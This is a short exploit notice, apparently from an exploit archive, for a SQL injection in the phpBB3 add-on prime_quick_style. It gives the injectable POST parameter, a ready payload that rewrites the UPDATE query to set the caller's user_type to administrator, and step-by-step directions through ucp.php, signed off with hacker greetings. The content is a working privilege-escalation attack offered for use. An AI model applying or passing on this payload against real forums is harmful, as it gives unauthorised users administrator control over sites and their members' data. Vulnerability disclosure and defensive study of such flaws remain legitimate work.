The phpBB3 add-on prime_quick_style suffers from a remote SQL injection vulnerability that allows for privilege escalation.
# phpBB3 addon prime_quick_style GetAdmin Exploit
# Vulnerability found and exploited by -SmoG-
# target file: prime_quick_style.php
# vuln: POST parameter "prime_quick_style" is injectable.
# source:
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
# gratz, now u will be an admin :)
# --- greetz to --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
# -( by -SmoG- )-